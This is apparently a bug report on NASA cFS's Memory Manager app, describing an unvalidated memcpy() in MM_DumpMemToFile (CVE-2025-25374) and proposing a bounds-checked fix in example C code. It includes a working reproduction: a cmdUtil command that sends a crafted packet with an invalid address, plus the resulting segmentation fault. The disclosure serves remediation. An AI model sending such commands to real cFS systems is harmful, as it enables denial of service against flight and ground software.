Checklist (Please check before submitting)
- I reviewed the Contributing Guide.
- I performed a cursory search to see if the bug report is relevant, not redundant, nor in conflict with other tickets.
Describe the bug
The MM_DumpMemToFile command handler does not validate the commanded memory address range before calling memcpy(). A malicious or malformed command can therefore make the handler read from invalid memory, and the application crashes with a segmentation fault: a denial of service against cFS.
To Reproduce
Steps to reproduce the behavior:
- Send a malicious command that specifies an invalid memory address:

```
./cmdUtil --host=localhost --port=1234 --pktid=0x1888 --pktfc=6 --endian=LE --uint32=1 --uint32=20 --int64=0x40 --string="64:" --string="64:/cf/dd"
sending data to 'localhost' (IP : 127.0.0.1); port 1234
Data to send:
0x18 0x88 0xC0 0x00 0x00 0x91 0x06 0x68
0x01 0x00 0x00 0x00 0x14 0x00 0x00 0x00
0x40 0x00 0x00 0x00 0x00 0x00 0x00 0x00
0x00 0x00 0x00 0x00 0x00 0x00 0x00 0x00
0x00 0x00 0x00 0x00 0x00 0x00 0x00 0x00
0x00 0x00 0x00 0x00 0x00 0x00 0x00 0x00
0x00 0x00 0x00 0x00 0x00 0x00 0x00 0x00
0x00 0x00 0x00 0x00 0x00 0x00 0x00 0x00
0x00 0x00 0x00 0x00 0x00 0x00 0x00 0x00
0x00 0x00 0x00 0x00 0x00 0x00 0x00 0x00
0x00 0x00 0x00 0x00 0x00 0x00 0x00 0x00
0x2F 0x63 0x66 0x2F 0x64 0x64 0x00 0x00
0x00 0x00 0x00 0x00 0x00 0x00 0x00 0x00
0x00 0x00 0x00 0x00 0x00 0x00 0x00 0x00
0x00 0x00 0x00 0x00 0x00 0x00 0x00 0x00
0x00 0x00 0x00 0x00 0x00 0x00 0x00 0x00
0x00 0x00 0x00 0x00 0x00 0x00 0x00 0x00
0x00 0x00 0x00 0x00 0x00 0x00 0x00 0x00
0x00 0x00 0x00 0x00 0x00 0x00 0x00 0x00
```
- Observe cFS crash on the target:

```
...
Segmentation fault
$
```
Expected behavior
cFS should reject a command that specifies an invalid address (and report the error) instead of crashing.
Code snips
Please see the article linked in "Additional context". Multiple memcpy() operations in the MM app remain unprotected by an address-range check.
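As an added illustration of the missing check (this is example code, not code from the MM app, from cFS, or from the linked assessment), the C program below contrasts an unchecked dump, which copies straight from the commanded address the way the report describes, with a variant that validates the requested range against a table of permitted regions before any memcpy(). The region table, the sample buffer, and every function name here are assumptions made for the example; the reading of the reproduction command as "address 0x40, 20 bytes" is also an assumption. The real MM code has its own configuration and verification routines, which this example does not reproduce.

```c
#include <stdbool.h>
#include <stddef.h>
#include <stdint.h>
#include <stdio.h>
#include <string.h>

/* Hypothetical table of address ranges a dump is allowed to read. On a
 * flight target this would come from platform configuration; here it is
 * built around a static buffer so the example runs on a desktop. */
typedef struct {
    uintptr_t Start;
    size_t    Size;
} DumpRegion;

/* Constructed sample "RAM" region, filled with a recognisable pattern. */
#define SAMPLE_RAM_SIZE 256
static uint8_t g_sample_ram[SAMPLE_RAM_SIZE];
static uint8_t g_dump_out[SAMPLE_RAM_SIZE];

uintptr_t sample_ram_base(void)
{
    for (size_t i = 0; i < SAMPLE_RAM_SIZE; i++) {
        g_sample_ram[i] = (uint8_t)i;
    }
    return (uintptr_t)g_sample_ram;
}

/* True only if [addr, addr + len) lies entirely inside the region.
 * Written with subtraction so that addr + len can never wrap around. */
static bool region_contains(const DumpRegion *r, uintptr_t addr, size_t len)
{
    if (len == 0 || addr < r->Start) {
        return false;
    }
    uintptr_t offset = addr - r->Start;
    if (offset >= r->Size) {
        return false;               /* starts at or past the end */
    }
    return len <= r->Size - offset; /* ends inside; no overflow possible */
}

/* What the report describes: copy from the commanded address with no
 * range check. With addr = 0x40, as in the reproduction, this faults. */
void dump_unchecked(uintptr_t addr, size_t len, uint8_t *out)
{
    memcpy(out, (const void *)addr, len);
}

/* Hardened variant: validate the range first. Returns 0 on success and
 * -1 when the request is rejected, in which case nothing is copied. */
int dump_checked(const DumpRegion *regions, size_t nregions,
                 uintptr_t addr, size_t len, uint8_t *out, size_t outcap)
{
    if (len == 0 || len > outcap) {
        return -1;
    }
    for (size_t i = 0; i < nregions; i++) {
        if (region_contains(&regions[i], addr, len)) {
            memcpy(out, (const void *)addr, len);
            return 0;
        }
    }
    return -1;
}

/* Convenience wrapper over the single sample region; returns the
 * dump_checked() result and leaves the copied bytes in g_dump_out. */
int dump_sample(uintptr_t addr, size_t len)
{
    DumpRegion regions[1] = { { sample_ram_base(), SAMPLE_RAM_SIZE } };
    return dump_checked(regions, 1, addr, len, g_dump_out, sizeof g_dump_out);
}

uint8_t dumped_byte(size_t i)
{
    return g_dump_out[i];
}

int main(void)
{
    uintptr_t base = sample_ram_base();
    uint8_t buf[20];

    /* A valid in-range request works with either version. */
    dump_unchecked(base + 4, sizeof buf, buf);
    printf("unchecked in-range dump: first byte 0x%02x\n", buf[0]);
    printf("checked   in-range dump: %d\n", dump_sample(base + 4, 20));

    /* The commanded address from the report is rejected, not dereferenced
     * (dump_unchecked(0x40, 20, buf) would segfault at this point). */
    printf("checked   addr 0x40:     %d\n", dump_sample(0x40, 20));
    /* A range that ends past the region, and a length larger than it. */
    printf("checked   tail overrun:  %d\n", dump_sample(base + 250, 20));
    printf("checked   huge length:   %d\n", dump_sample(base + 4, SIZE_MAX));
    return 0;
}
```

The design point is the subtraction-based bounds test: checking `addr + len <= end` directly can wrap on a 32-bit target and let an out-of-range request through, whereas `len <= Size - offset` cannot overflow once `offset < Size` has been established.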
System observed on:
- Hardware: All hardware is potentially vulnerable
- OS: Linux-based operating systems
- Versions: cFS Aquila, MM main
Additional context
See CVE-2025-25374 and section 2.2 of the NASA cFS version Aquila Software Vulnerability Assessment.
Reporter Info
Levi Shafter - 21Software